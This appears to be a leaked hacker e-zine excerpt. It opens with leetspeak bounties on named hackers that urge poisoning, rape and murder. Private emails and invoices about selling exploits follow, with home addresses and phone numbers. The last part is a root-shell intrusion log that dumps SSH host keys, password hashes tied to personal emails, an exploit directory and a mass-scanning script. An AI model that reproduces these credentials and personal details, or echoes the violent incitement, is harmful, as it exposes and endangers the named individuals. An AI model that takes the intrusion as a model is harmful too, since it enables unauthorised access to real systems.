jtr t0 cr4ck n0b0dy 4cc0untz 4ll d4y 1s t1r3ds0me.. w3 n33d p30pl3
w1th s0m3 sk1llz!
4ft3r th3 gr34t 1d34 0f s3ll1ng 3xc3l 0d4yz & a p3n 0n 3b4y w3 h4v3
d3c1d3d t0 us3 3b4y 4s 0ur f0rm 0f h4q-4-h1r3. w3 w1ll b3 p0zt1ng 1
m0th3rfuq3r p3r m0nth wh0 1z juzt t00 3l1t3 f0r us3 t0 fuckz w1th.
1f y0u c4n 0wn h1m, s3nd uz th3 0d4y y0u us3d & y0u w1ll g3t th3 r3w4rd
0f 15 m1nz 0f fr33 c4ll1ng k4rdz. 0r 1f y0u w1sh 4 s1gn3d c0py 0f th3
c1zc0 I0S src.
t0 g3t th1ngz st4rt3d w3 w1ll p0st th3 f1rst 6 el1t3z s0 y0u c4n g3t
4n 34rly jump 0n th3 c0mp1t10n.
1t3m #1: 0wn1ng 0f fl4tl1n3
4l14s: fl4tt1r3. l33tsecuritycumbuck3t
bi0: 4dm1nz greyhat.nl & blackhat.nl l1k3 a ch4mp!
piq: < -8 u 8- >
fav quote: "public/private, i don't give a shit"
fl4tl1n3 1s 4 f3ll0w dutch wh0 3nj0yz h3lp1ng bys1n sp4m
& d1str1but1ng h1s 3 y34r 0ld s4mb4 3xpl01t. h3 r34lly c4nt
h4ck, but m4k3z fun 0f z3n0m0rph & ADM.. s0 h3 muzt b3 3l1t3.
fl4tl1n3 suckz d1q @ xs4all.nl t0 g3t th3 0d4y t1 l1n3 h3 uz3z
t0 1dl3 0n #l33tsecurity... 4nd d0nt y0u d4r3 t3ll h1z c4bl3
c0mp4ny 4b0ut h1m unscr4mbl1ng th3 sp1c3 ch4nn3l! (th1z 1z why
h3 1z 4fk 4ll d4y).
f0r h4ql0g 0f th1s l4m3r w3 4r3 w1ll1ng t0 g1v3 up 0ur
p3rs0n4l s4mb4 0d4y wh1ch w0rkz n34rly 4s g00d 4s fl4tl1n3'z.
1t3m #2: br34k1ng up r4v3 & styx
~-~ r4v3 ~-~
4l14s: j0hnny cumbuck3t
bi0: c4tch3z cum f0r a l1v1ng.
piq: <;; X ;;>
fav quote: "suq diq"
~-~ styx ~-~
4l14s: whore
bi0: is a whore
piq: >-80
fav quote: "suq diq"
th1z pr0p0s4l h4z alr34dy b33n fullf1ll3d.
1t3m #3: phys1c4lly br34k1ng m0rn1ng_w00d'z g00d 4rm
4l14s: d0nn1e cumbuck3t
bi0: wr1t3z n34r n3w y0rk tym3z qu4l1ty 4rt1cl3z 0n zone-h.org!
piq: >-0-
fav quote: "No fix on 0day"
1t3m #4: p0s10n1ng awk'z st3r10dz
4l14s: awk, muzl3m4n, p1llp0pp3r
bi0: awk can grawl.
piq: ()----X-----()
fav quote: "GRRAWWWLLL!!@# 0D4YZ!@# GRRRWWAAWWWLLL!!@#!@#"
th1z 0v3r gr0wn ap3 c4nt s33m t0 qu1t ju1c1ng. f0r h1z s4ft3y 4nd 0urz plz
1nj3ct h1z st3r10dz w1th 4z much strychn1n3 4z p0zz1bl3.
1t3m #5: r4p3 & murd3r 0f r4f4
4l14s: rafa
bi0: w1ll d4zzl3 y0u w1th h1z gr4ph1x th3n 0wn y0u w1th DDoS!!
piq: | | | | :{ | | | |
fav quote: "DDoS this for me"
th1z h4q3r turn3d m0d3l h4z w3nt fr0m b0x.sk f4m3 2 f8l4bz 2 pr1s0n
1n 2 sh0rt y34rz. wh4t h4pp3nd r4f4? h0w d1d y0u f4ll fr0m gr4c3
s0 fuqn qu1ck?
1n0rd3r t0 f1n1sh th3 j0b & r1d th3 w0rld 0f th1z fuqn scumbuck3t,
h0no pr0p0s3z th4t r4f4 b3 r4p3d wh1l3 1n pr1s0n. 1f p0ss1bl3 k33p
h1m 4l1v3 l0ng 3n0ugh t0 sh1t 0n h1z f4c3.
th3z3 4r3 4ll 0f th3 pr0p0s4lz w3 c4n cum up w1th f0r n0w!! g00d luck!!@
16.txt -~-~-~ kf g03z br0k3
n0th1ng t0 s4y but g00d luck w1th digitalmunition!
From: Kevin Finisterre <kf@digitalmunition.com>
To: "Robert E. Desautels" <red@secnetops.com>,
"Adriel T. Desautels" <atd@secnetops.com>
Subject: loot is in the mail ala fedx.
I was told this morning that 16k is in the mail ala fedx from HB.
I wanted to remind all parties involved that that LAST check that came
in I was told I would be paid the outstanding $1200 bones... due to a
misunderstanding this did not happen.
During the post mortum on this incident it was once again agreed upon
that with the NEXT HB check (this one) my 1200 bones would be paid in
full in addition to my normal %age of the check.
I would rather be paid in w2 form if possible... I am not interested in
the whole 1099 B.S. next year at tax time (uncle sam raped me in the
ass). Take my taxes now if you can. John should be paid his percentage
in a manor that does NOT involve me as I am no longer involved in the
company. 1099 vs. w2 is a conversation someone other than me needs to
have with him...
Thanks for your time.
-KF
P.S. If I need to dig up the email trail where the statements about the
1200 bones were made I certainly can...
From: Kevin finisterre <kf@digitalmunition.com>
To: "Robert E. Desautels" <red@secnetops.com>,
Robert Desautels <red@hrgresearch.com>,
"Adriel T. Desautels" <atd@secnetops.com>,
loki <wscates@secnetops.com>, jtibbs <jtibbs@secnetops.com>,
john@oxideas.com, JohnH <johnh@digitalmunition.com>,
kf@digitalmunition.com
Subject: Invoice for Mercury/32
This is the invoice (if necessary) for the Mercury/32 items.
-KF
--------------020602010701080109040309
filename="Invoice1.txt"
Kevin Finisterre - DigitalMunition.com
957 Sells Ave.
Columbus, Ohio 43212
(614)209-6737
Invoice sent via email: 03/11/05
Payment is due upon recepit.
TO: Secure Network Operations
1740 Mass Ave
Boxborough, MA 01719
RE: 33% of 16k payment for Mercury/32 exploit via HBGary Inc.
Date of agreement: Roughly September of October of 2004
Witness to agreement: Adriel T. Desautels. , Robert E. Desautels, John Hale
Description of purchase:
$5280 Payment for research and development of Mercury/32 Ph exploit.
13% of this payment will be paid to John Hale for services rendered.
Total Due: $5280.00
NOTICE: Further delinquency in payment will result in a 1.5% fee per month of
non payment. After 2 months a collection agency will be involved.
Cc: "'Kevin Finisterre'" <kf@digitalmunition.com>,
"'loki'" <wscates@secnetops.com>,
"'Adriel T. Desautels'" <atd@secnetops.com>
From: jtibbs <jtibbs@secnetops.com>
Subject: Re: loot is in the mail ala fedx.
Date: Fri, 11 Mar 2005 15:22:19 -0600
To: "Robert E. Desautels" <red@secnetops.com>
Jesus Freaking Christ!
Enough already. This is business, this is not a personal issue, if
your taking it personal STOP NOW. Kevin is owed money. We are going to
pay him money. Whether or not anyone is pissed at him or he is pissed
at anyone else is MOOT! So further communication from either side
should and WILL be in the upmost professional manner. Kev is owed
money, he's been owed this money for quite some time now. Kev you'll
be paid within 30 days just like I told you on the phone. We all know
he was owed this money, to stop and play games like this on both sides
is really getting on my last nerve.
So Kev.. you invoiced us. If there is a discrepancy with the
percentage we need to discuss this, otherwise your payments will be
made within the next 30 days or as is my understanding. Am I wrong on
this? If so Adriel or Red, do please let me know so I can figure out
where the communication line was broken.
Thanks
Justin
From: "Adriel T. Desautels" <atd@secnetops.com>
To: "'Kevin Finisterre'" <kf@digitalmunition.com>,
"'Robert E. Desautels'" <red@secnetops.com>
Cc: "'jtibbs'" <jtibbs@secnetops.com>,
"'loki'" <wscates@secnetops.com>
Subject: RE: loot is in the mail ala fedx.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Guys,
End this thread. I don't want to see emails from anyone to anyone
regarding this topic any more. Kevin, you will be paid what you are
owed in accordance with the terms that RED set fourth. I will sit
down with Red and Will on Monday to create a letter of intent for you
to formalize this issue. Email is not a way to iron this out.
Adriel T. Desautels
Founder and CTO
Secure Network Operations
Embracing the future of technology, protecting you.
Office: 978-263-3829 Fax: 978-263-3313
atd@secnetops.com www.secnetops.com
- -----Original Message-----
From: Kevin Finisterre [mailto:kf@digitalmunition.com]
Sent: Friday, March 11, 2005 4:30 PM
To: Robert E. Desautels
Cc: 'jtibbs'; 'loki'; 'Adriel T. Desautels'
Subject: Re: loot is in the mail ala fedx.
Robert... quick playing fucking games with me man.
I am sick of you trying to push my buttons in order to invoke
responses like this.
You basically asked me to send you an invoice so that you could pull
this 30 day BS...
As stated in the invoice payment is due immediately. Not in 30 days.
I am not a "Supplier" I was supposed to be a partner...
As for our "Original agreement" the agreement never stated that I had
to pay John H any money at all... it was implied to me that John
would be pay BY SNO...
Kevin you get "30%" is not Kevin you get "30%" and get to pay john
H....
so don't go there...
And since we are on the subject of disrespect... I hope you don't
fuck all your partners in the ass... thats extremely disrespectful.
have a nice day.
- -KF
Robert E. Desautels wrote:
>Kevin,
>
>I find it hard to understand why you can not comprehend that I would
> find the tone and choice of words in your previous e-mails to me to
>be disrespectful and insulting. In the future please communicate
>with me in a professional and courteous manner befitting of your
>talent and intellect.
>
>Regarding your invoice to Secure Network Operations the company's
>normal payment terms are net 30 days from receipt of invoice, which
>is industry standard. In cases where a supplier offers prompt
>payment discounts of 2.5% an accelerated payment schedule of net 15
>days can be accommodated.
>
>Finally our original agreement was for 30% not 33%. We made an
>exception on the last payment to you and paid you at the 33% rate.
>If you have documentation that shows me to be wrong please provide
>it and I will take it under consideration.
>
>Thanks and best regards,
>
>Robert Desautels
>
>-----Original Message-----
>From: Kevin Finisterre [mailto:kf@digitalmunition.com]
>Sent: Friday, March 11, 2005 3:32 PM
>To: Robert E. Desautels
>Subject: Re: loot is in the mail ala fedx.
>
>Please point out the insult? I must have missed it... I simply
>stated the facts. Insulting you was not my intent... expressing my
>extreme displeasure in the actions that have occured was the goal.
>
>-KF
>
>Robert E. Desautels wrote:
>
>
>>Kevin,
>>
>>Insulting me is not a good way to motivate me.
>>
>>Best regards,
>>
>>RED
>>
>>-----Original Message-----
>>From: Kevin Finisterre [mailto:kf@digitalmunition.com]
>>Sent: Friday, March 11, 2005 11:38 AM
>>To: Robert E. Desautels
>>Cc: 'Adriel T. Desautels'; 'loki'; jtibbs
>>Subject: Re: loot is in the mail ala fedx.
>>
>>Fine... I'll take the 1099 and I'll pay john... I can understand
>>that I guess.
>>
>>and since conviently you have fogotten once again I'll find the
>>emails... you should try searching you own inbox.... btw. This is
>>twice I have had to dig up emails you should have... just because
>>you 'forgot'
>>
>>This $1200 bucks has been owed since sept of last year at least....
>> its pathetic that you are still trying to put the payment off...
>>
>>
>>(very pissed) -KF
>>
>>
>>Robert E. Desautels wrote:
>>
>>
>>
>>
>>>Kevin,
>>>
>>>Regarding what is owed to John. How much is it? If you do not
>>>want to pay John I will but it will be deducted from the 30%.
>>>Please make sure that I have John's name, address, city,
>>>state,zip, and ss# so I can file a 1099
>>>
>>>
>>for
>>
>>
>>
>>>him when the time comes.
>>>
>>>Once I the info I need from you regarding John I will send you
>>>each your respective fee payments.
>>>
>>>Thanks
>>>
>>>RED
>>>
>>>-----Original Message-----
>>>From: Kevin Finisterre [mailto:kf@digitalmunition.com]
>>>Sent: Friday, March 11, 2005 10:38 AM
>>>To: Robert E. Desautels; Adriel T. Desautels
>>>Subject: loot is in the mail ala fedx.
>>>
>>>I was told this morning that 16k is in the mail ala fedx from HB.
>>>
>>>I wanted to remind all parties involved that that LAST check that
>>>came in I was told I would be paid the outstanding $1200 bones...
>>>due to a misunderstanding this did not happen.
>>>
>>>During the post mortum on this incident it was once again agreed
>>>upon that with the NEXT HB check (this one) my 1200 bones would
>>>be paid in full in addition to my normal %age of the check.
>>>
>>>I would rather be paid in w2 form if possible... I am not
>>>interested in the whole 1099 B.S. next year at tax time (uncle
>>>sam raped me in the ass). Take my taxes now if you can. John
>>>should be paid his percentage in a manor that does NOT involve me
>>>as I am no longer involved in the company. 1099 vs. w2 is a
>>>conversation someone other than
>>>
>>>
>me needs to have with him...
>
>
>>>Thanks for your time.
>>>
>>>-KF
>>>
>>>P.S. If I need to dig up the email trail where the statements
>>>about the
>>>
>>>
>>1200
>>
>>
>>
>>>bones were made I certainly can...
>>>
>>>
>>>
>>>
>>>
>>>
>>>
>>>
>>
>>
>>
>>
>>
>
>
>
>
>
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBQjIR0LR5YB3MHZrzEQLPAwCeL+KWcwnbzkAQ/Zw6m6ZRj2zAAY0AnR5j
qRyE0fT1G9TihnIZht9pxPMz
=XkXB
-----END PGP SIGNATURE-----
--------------070300080701090706040507
Content-Type: text/plain;
name="KF.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="KF.txt"
tax on KF needs to be accounted for.
Out of 4 items that we were P.O.'d for we have been paid for 3 and you
are entitled to 13% for 2 of these items. You are also entitled to hourly
pay for items that were sold or that we agreed you would be paid for.
The items that sold were and involve you are:
$3000 itunes - KF collected $1000 on 10/18/04
$16000 mercury #1 - KF collected $5280 on 04/03/05
Items pending sale are:
veritas
cso (dead item) - traded for mercury #2 per client request.
sold items pending pay are:
$12000 mercury #2 - KF has collected $0 on this item. 50/50 split upon arrival.
Your entitlement of percentage is for itunes and mercury #1. The stated
percentage was 13% of KF's take home for each item. If CSO is sold the
same rules apply.
$130 - itunes entitlement
$686.40 - mercury #1 entitlement
As of 10/25 the hours that I have recorded as 'payable' hours are:
mercury vuln #1 = 7.5 hours
mercury vuln #2 = will be dealt with seperately since it was not sold through SNO
- kaffiene = 5 hours. This vuln was not exploited nor sold.
vertias = 9.5 hrs. This will be negotiated upon sale of veritas items.
gpsd = 6 hours. Item was not sold but was exploited.
ITunes = 16 hours work. Item was sold and exploited.
Total 44 hours of work @38 per hour. $1672 (when I paid you out of pocket it was
26 an hour)
Your total entitlement is:
Hourly $1672
%age $816.4
Total $2488
To date I have paypal'd you $1168
The payment breakdown is as follows:
Jan. 6, 2005 Payment To John Hale Completed Details
-$450.00 USD $0.00 USD -$450.00 USD
Nov. 4, 2004 Payment To John Hale Completed Details
-$100.00 USD $0.00 USD -$100.00 USD
Oct. 22, 2004 Payment To John Hale Completed Details
-$168.00 USD $0.00 USD -$168.00 USD
Oct. 20, 2004 Payment To John Hale Completed Details
-$225.00 USD $0.00 USD -$225.00 USD
Sep. 20, 2004 Payment To John Hale Completed Details
-$225.00 USD $0.00 USD -$225.00 USD
Total owed.
$1320
From: Kevin Finisterre <kf@digitalmunition.com>
To: penny@hbgary.com, JohnH <john@oxideas.com>,
Bob Slapnik <bob@hbgary.com>
Subject: Invoice from Kevin Finisterre
This is a multi-part message in MIME format.
--------------030804010207090205070906
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
--------------030804010207090205070906
Content-Type: text/plain;
name="Invoice1.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="Invoice1.txt"
Kevin Finisterre - DigitalMunition.com
957 Sells Ave.
Columbus, Ohio 43212
(614)209-6737
Invoice sent via email: 06/14/05
Payment is due upon recepit.
TO: HBGary Headquarters
574 E Weddell Drive, Suite 8
Sunnyvale, CA 94089
or
HBGary East Coast Office
7212 Chestnut Street
Chevy Chase, MD 20815
RE: 12k payment for Mercury/32 exploit #2 via HBGary Inc.
Date of agreement: Roughly November or December of 2004
Witness to agreement: John Hale
Description of purchase:
$12,000 Payment for research and development of Mercury/32 PopPass exploit.
$6,000 of this payment will be paid to John Hale for services rendered
on behalf of Kevin Finisterre.
Total Due: $12,000.00
The check should be made payable to "Kevin Finisterre"
17.txt -~-~-~ d4rp4n3t/d1s.0rg fuqt4rd s31z3d
Th1z 1z n0 cl0wn b0yz & g1rlz, 1t 1z j0k3r fr0m th3 m0thrfuck1n d4rp4n3t.
0r 4z h1s fr13ndz c4ll h1m, enr1que th3 3rd (0r 1n pr1s0n 4s 'e4zy l4y
enr1que' 4z h3 h4d a t3nd3ncy t0 dr0p th3 s04p.) g1v3z h0no 4n 4ll
3xclus1v3 p4zz @ th3 w0rld f4m0uz d1z.org sh3ll b0x. Th4nkz d00d!
w3 f0und 4n0th3r d4rp4 fuq 2 0wn 2 sh1t. 4r3 y0u sur3 y0u w4nt t0 t4ng0 c4m3l?
[root@theamericanunderground] # pwd
/root
[root@theamericanunderground] # ls -al
total 24888
drwxr-xr-x 10 root wheel 512 Jul 13 09:16 .
drwxr-xr-x 22 root wheel 512 Sep 4 2005 ..
-rw------- 1 root wheel 8826 May 14 2005 .bash_history
drwxr-xr-x 2 root wheel 512 Jan 31 22:34 .bashrd
-rw-r--r-- 1 root wheel 802 Nov 7 2003 .cshrc
-rw-r--r-- 1 root wheel 142 Nov 7 2003 .klogin
-rw-r--r-- 1 root wheel 297 Nov 7 2003 .login
-rw------- 1 root wheel 0 Nov 7 2003 .mysql_history
-rw-r--r-- 1 root wheel 251 Nov 7 2003 .profile
-rw------- 1 root wheel 1024 Dec 4 2003 .rnd
drwx------ 2 root wheel 512 Nov 19 2003 .ssh
drwxr-xr-x 3 root wheel 512 Jul 12 2005 bah
-rw-r--r-- 1 root wheel 2553724 Feb 13 14:57 blH
-rw-r--r-- 1 root wheel 15769700 Jan 12 20:27 blah
-rw-r--r-- 1 root wheel 6968847 Oct 7 2005 mails.txt
drwxr-xr-x 2 root wheel 512 Jun 6 2005 nsb
drwxr-xr-x 3 root wheel 512 May 14 2005 omailweb
drwxr-xr-x 5 root wheel 512 Aug 11 2005 qmail
drwxr-xr-x 2 root wheel 512 Mar 23 01:54 spl0it
-r-xr-xr-x 1 root wheel 78964 Aug 11 2005 sysctl
drwxr-xr-x 94 3001 wheel 3584 Nov 8 2003 webmin-1.121
[root@theamericanunderground] # ls -al spl0it
total 6900
drwxr-xr-x 2 root wheel 512 Mar 23 01:54 .
drwxr-xr-x 10 root wheel 512 Jul 13 09:16 ..
-rwxrwxrwx 1 root wheel 19552 Mar 23 01:54 nsb
-rwxrwxrwx 1 root wheel 80 Mar 23 01:54 run
-rw-r--r-- 1 root wheel 7006564 Mar 23 01:56 us.range
-rw-r--r-- 1 root wheel 8772 Jun 6 2005 x86-kmem_inject.c
[root@theamericanunderground] # head spl0it/x86-kmem_inject.c
/*
* remote /dev/mem injection shellcode
* rjohnson@uninformed.org
*
****************************************************************************
* Warning: Make sure you read the notes before you run this code!
****************************************************************************
*
* This program will fork a client/server to test the kmem_inject shellcode
* The server listens on DEFAULT_PORT and executes the kernel infection
[root@theamericanunderground] # cat .ssh/known_hosts
ica.innerpulse.com,66.135.33.141 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA5isJuCsNwX20hYidJe2ovfhfQkQyZx69YLyDC+tZTsGHz/0p7B1azP7n2T2NlBY8n5HkYUxeE0pyA//k7Qy7uZHYhNqVV2/xUBPWAKU3z6cRCOMt2cKR7iqAVhBueka9EyOKPvQuEZTWQwm6n623TD3dbZnq4aTymPMFGt/rz1s=
218.66.104.133 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEArGzIaeedyHXJ6cjKhthH2q0UlK8VQ8TkHvL0vnUYQ6KPKwyKx8MlBBQfv3mrXEhpJ2xARruZZomCb5vIDSitoauqU7To26FpEFQ1HOVZV5bB4RSjtLccB8V9PGpdyrpX/WHEw40DXI4SLSi2Z2hDHN80y1zRdBsKTv5c/kW9iI0=
localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAoNwczdPNgAl9kpOGX+sCispQz0mGej1uX1PTKFj9YRwzMyBJUOT8CDui++QCyuZFgG8meIAcoywLRgdh8nJ6EFatVAged6rlltrgrXQ1s4tm500cAnR+p3SKQa50Yd4kJvuwzkYPjmOFl7ZrM3s+ulg1/DnXvoJdYW5BpqBd3LM=
mindshadow.net,208.187.81.33 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzJar3YuhtBMS+w9TYUi70u0IOHaXaBIdCCHd1JIEO9agavqIKy/ydGUnUbhKDZtP4H4tE7ud3igESX01MpW6bSF5VBS4sNls4z5rPi66zbg4AYepcpv9k5w+lu353vBvIqiaQwLdU1FdLRWq/GpjYrPSPK0VlMgCF82piHme33U=
dat0rgat0r.mindshadow.net ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzJar3YuhtBMS+w9TYUi70u0IOHaXaBIdCCHd1JIEO9agavqIKy/ydGUnUbhKDZtP4H4tE7ud3igESX01MpW6bSF5VBS4sNls4z5rPi66zbg4AYepcpv9k5w+lu353vBvIqiaQwLdU1FdLRWq/GpjYrPSPK0VlMgCF82piHme33U=
61.152.158.111 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAk4wL7Cq072Z8ER8bJQuopq9/ctykSg5x06B2Gfs1ADchYYIk5nO1xrLOoeM3X3PjxmmxB+WLSd/HhrdRrPjXpAV+JRSfMprzxUMQ8hFG3iwL6qFU+Oe4nIf0kdoujubkLXWeIA5UfwFnLCRMYqfYP6Yjo3WhemKZY1jpzmoDb/M=
61.129.115.90 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA3TlY7zCK+PkRD6ZbbJN4O8t6nKz7Csosb95lwqi3mI10XjRECRpLEjz+Q7fcilrn+pUig0dSjAf6lpgOBUFhIgjPEp6RLDxJ/GS/DYmpvXnfGqYCYvE0AXx/Kl01RQizzBRsp1hcxLfq9hSpuHhdWsdolGUwFl0IY0f6W3GVOXk=
kizmiaz.dis.org,216.240.45.60 ssh-dss AAAAB3NzaC1kc3MAAACBAKjbFRzf4b/qq9gvF2GIW6hTXR6uFuho3acyrEB0jNp4xWdKjxyaLBGVQj4w9pdlJgCI+RKM1kUaE1pM1HpHpQGvsBmKEfc64+vuGe48ltAMRNczKFawVhvPOoPzinkMF7IJaUe/PH3nEKQViAoODKX72HLhYPInAX2tyLdfehjBAAAAFQCTcZUslELJmWaDVAsAxH95FFvffwAAAIARgJS3f/9zTaNY8N3hFQEaQdnGl0hXcPvXgKAcT7BHBgDR7IzmGVXHZOn0oy93HRPGxzFZsIbiFW3Xv0ldw7fdEnDy6bgG8BNaXphCf1CaWpIaAeWVXL78qTWxXOyodIsVFTRMsQ1IYb7CutGpxY27GzigChGGx3plt0GXpvmvAwAAAIEAhBW3U7fjQ87TTvFJkYqvsUP8B/PRtFHHUG8Y54c0CRsUSHs5aYRycVNrW5o9YQXSfXPy1pqNJ4UnpN88zQ41zMEknButTasYlooagV+XdcX8q2annjjOXRTKeh8exCjjIYbWxN3cf32L6tbM7wzg6m2XacCa5YUFTVUgCEIY0c0=
theamericanunderground.com,66.235.215.176 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAoNwczdPNgAl9kpOGX+sCispQz0mGej1uX1PTKFj9YRwzMyBJUOT8CDui++QCyuZFgG8meIAcoywLRgdh8nJ6EFatVAged6rlltrgrXQ1s4tm500cAnR+p3SKQa50Yd4kJvuwzkYPjmOFl7ZrM3s+ulg1/DnXvoJdYW5BpqBd3LM=
67.138.244.8 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzJar3YuhtBMS+w9TYUi70u0IOHaXaBIdCCHd1JIEO9agavqIKy/ydGUnUbhKDZtP4H4tE7ud3igESX01MpW6bSF5VBS4sNls4z5rPi66zbg4AYepcpv9k5w+lu353vBvIqiaQwLdU1FdLRWq/GpjYrPSPK0VlMgCF82piHme33U=
221.203.145.73 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAud9IJCUrFgTwi5RgrSkVs5ujoQlyMpdatsX9HEj/ilhpCsN8pkpsvAfkHoxrneQevveLNYgoU1skgYBqk5rIha4px/6W/uCT3R81mi+T8vnEk5dbzoXdKmkXFfYoJSwJ4SAkYtj+73McajvAaQni4Qhg39sQLxRAbe+PyMthTqk=
vh56.ipowerweb.com,66.235.215.182 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAoNwczdPNgAl9kpOGX+sCispQz0mGej1uX1PTKFj9YRwzMyBJUOT8CDui++QCyuZFgG8meIAcoywLRgdh8nJ6EFatVAged6rlltrgrXQ1s4tm500cAnR+p3SKQa50Yd4kJvuwzkYPjmOFl7ZrM3s+ulg1/DnXvoJdYW5BpqBd3LM=
[root@theamericanunderground] # ls -al /home/
ctotal 26
drwxr-xr-x 13 root wheel 512 Apr 18 05:20 .
drwxr-xr-x 17 root wheel 512 Aug 11 2005 ..
drwxr-xr-x 3 au au 512 Jul 12 22:59 au
drwxr-xr-x 3 dan dan 512 May 19 2005 dagger
drwxr-xr-x 3 dan dan 512 Apr 18 04:07 dan
drwxr-xr-x 4 fwm fwm 512 Jul 13 00:28 fwm
drwxr-xr-x 3 root wheel 512 Nov 10 2003 httpd
drwxr-xr-x 4 iphear iphear 512 Jun 26 23:26 iphear
drwxr-xr-x 5 joker joker 512 Nov 2 2005 joker
drwxr-xr-x 2 oklet oklet 512 Apr 18 05:38 oklet
drwxr-xr-x 3 sftrr sftrr 512 Oct 29 2005 sftrr
drwxr-xr-x 3 webmail webmail 512 Nov 11 2003 test1
drwxr-xr-x 2 webmail webmail 512 May 14 2005 webmail
[root@theamericanunderground] # strings /home/fwm/passwd.cdb
mailer-daemon
postmaster@
1116054186
postmaster
postmaster@
1116054186
root
$1$HmkOnLag$0tYRMWtIJ4Re7P6lizyVx.
postmaster@
1116054186
enrique
$1$GEIBJpzM$8mB6tdAxycBEJlfa9m3bh.
./users/enrique
1116054211
enrique@dis.org
enrique
1116054266
info
$1$GX7JdfG0$SlTWqAndT8KnvvV3K0CDX.
aaron
1116054297
jamaal
$1$qDN5h1mu$Bfy8Tcu4UB5NmlZvvefjz0
./users/jamaal
1116057014
aaron
$1$Xb/McAGE$M4APB64nC4LaQcf3tNRM3.
./users/aaron
1116057484
$1$X4XQKYz.$2wz07oYxz3R/yBRcvcpe01
./users/dan
drayjewell@earthlink.net
1116270912
$1$PsLRAfdL$U9SJeI5uKfXwvK6oY3j65.
./users/kim
kdwilliams35@yahoo.com
1116270951
michael
$1$y7wxJmY/$w55P3Rl8BOxNrt31Qw2qZ/
./users/michael
shownoquarter@gmail.com
1152750386
todd
$1$qn1FgMbD$NdITqScfuhIPHmTN4rnuK.
./users/todd
todd@toddblackphotography.com
1152750431
88T?
q|l
[root@theamericanunderground] # head /home/oklet/freaky.list
12.0.0.0 12.0.255.255
12.100.0.0 12.100.255.255
12.10.0.0 12.10.255.255
12.1.0.0 12.1.255.255
12.101.0.0 12.101.255.255
12.102.0.0 12.102.255.255
12.103.0.0 12.103.255.255
12.104.0.0 12.104.255.255
12.105.0.0 12.105.255.255
12.106.0.0 12.106.255.255
[root@theamericanunderground] # cat /home/oklet/run
#!/bin/sh
for i in xaa xab xac xad; do
./nsb 1 1 SYSTEM ALERT 1 150 $i &
done
[root@theamericanunderground] # ssh erik@dat0rgat0r.mindshadow.net
[erik@dat0rgat0r] $ id
uid=1016(erik) gid=100(users) groups=14(uucp),16(dialout),17(audio),33(video),100(users)
[erik@dat0rgat0r] $ uname -a
Linux beckyruxpin 2.6.5-7.202.7-smp #1 SMP Tue Nov 29 14:32:53 UTC 2005 i686 i686 i386 GNU/Linux
[erik@dat0rgat0r] $ ls -al
total 78659
drwxr-xr-x 27 erik users 1976 2006-01-16 22:33 .
drwxr-xr-x 21 root root 528 2005-12-13 04:36 ..
drwxr-xr-x 2 erik users 168 2005-07-09 17:50 080705
drwxr-xr-x 2 erik users 72 2005-08-17 22:14 300
-rw-r--r-- 1 erik users 37463932 2005-07-23 20:24 300hugh
-rw-r--r-- 1 erik users 12926192 2005-07-06 13:33 300master
-rw------- 1 erik users 11754 2006-01-16 15:28 .bash_history
-rw-r--r-- 1 erik users 1286 2005-01-31 20:35 .bashrc
drwx------ 3 erik users 104 2005-06-06 04:41 .BitchX
-rw-r--r-- 1 erik users 0 2005-05-16 13:35 classB.list
-rw-r--r-- 1 erik users 601960 2005-05-22 12:21 country.tar.bz2
-rw-r--r-- 1 erik users 1015808 2005-06-06 21:47 downloadme.tar.gz.bz2
-rw-r--r-- 1 erik users 208 2005-01-31 20:35 .dvipsrc
-rw-r--r-- 1 erik users 0 2005-09-02 04:08 E
-rw-r--r-- 1 erik users 1637 2005-01-31 20:35 .emacs
-rw-r--r-- 1 erik users 1124 2005-01-31 20:35 .exrc
-rw-r--r-- 1 erik users 337642 2005-08-30 10:14 fin.log
-r--r--r-- 1 erik users 8187 2005-12-15 15:17 .fishsrv.pl
drwxr-xr-x 2 erik users 48 2005-01-31 20:35 .fonts
drwxr-xr-x 2 erik users 72 2005-07-20 16:37 freaky072005
drwxr-xr-x 2 erik users 136 2005-06-30 19:17 freakynewlogs
-rw-r--r-- 1 erik users 97698 1999-08-16 17:13 fts-rvscan.v1-r1.tgz
-rw-r--r-- 1 erik users 44 2005-08-17 18:26 fwmservers
-rw-r--r-- 1 erik users 1937306 2005-07-08 00:10 gbnew
drwxr-xr-x 2 erik users 256 2005-07-18 15:00 gkdh
drwxr-xr-x 3 erik users 104 2005-05-22 12:42 global
drwxr-xr-x 2 erik users 48 2006-01-11 02:55 ica
drwxr-xr-x 2 erik users 168 2005-08-23 00:41 ipplset
-rw-r--r-- 1 erik users 7476605 2005-05-17 02:51 ipplsorted.bz2
-rw-r--r-- 1 erik users 43226 2005-08-31 06:33 ip_range_gov_mil_fbi_cia.txt
drwxr-xr-x 2 erik users 264 2005-07-23 13:07 iua
-rw-r--r-- 1 erik users 164 2005-01-31 20:35 .kermrc
drwxr-xr-x 2 erik users 48 2005-07-23 13:14 logs
-rw------- 1 erik users 3011 2005-06-07 14:29 mbox
-rwxr-xr-x 1 erik users 0 2005-07-03 15:51 mega
drwxr-xr-x 2 erik users 256 2005-10-20 00:23 misc
-rw-r--r-- 1 erik users 6148 2005-01-31 20:35 .muttrc
-rwxr-xr-x 1 erik users 276 2005-06-20 12:38 neekclassb
-rwxrwxrwx 1 erik users 278 2005-05-17 02:56 neekclassc
-rw-r--r-- 1 erik users 7005938 2005-05-17 17:13 neekippl
drwxr-xr-x 3 erik users 72 2005-05-26 04:37 new
-rw-r--r-- 1 erik users 2119482 2005-05-15 06:09 newlist.bz2
